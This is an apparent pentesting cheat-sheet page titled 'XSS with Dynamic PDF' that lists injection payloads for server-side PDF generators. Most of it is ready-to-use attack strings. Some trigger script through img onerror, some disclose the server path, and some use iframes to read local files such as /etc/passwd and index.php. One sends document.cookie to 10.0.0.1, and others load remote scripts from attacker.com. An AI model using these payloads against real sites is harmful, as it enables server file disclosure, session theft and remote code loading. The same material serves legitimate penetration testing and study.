Exploit Notes

XSS with Dynamic PDF

Last modified: 2023-02-21

XSS Web

If the PDF file, which is created somewhere in the website, that is reflected our payloads, we can insert malicious code.

Exploitation

Here insert the payload into POST params.

Basic

<img src='x' onerror="document.write('test')">

<script>document.write('test')</script>

Path Disclosure

<img src='x' onerror="document.write(JSON.stringify(window.location))">

<script>document.write('<iframe src=\"' + window.location.href + '\"></iframe>')</script>

LFI/RFI

<iframe src="file:///etc/passwd"></iframe>
<iframe src=file:///etc/passwd width=1000px height=1000px></iframe>
<iframe src=file:///var/www/html/index.php width=1000px height=1000px></iframe>
<iframe src="http://localhost:3000/index.html"></iframe>

<img src='x' onerror="document.write('<iframe src=file:///etc/passwd></iframe>')">
<img src=x onerror="location.href='http://10.0.0.1/?cookie='+ document.cookie">

External Scripts

<script src="http://attacker.com/test.js"></script>

<img src='x' onerror="document.write('<script src=\"http://10.0.0.1/test.js\"></script>')" />

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.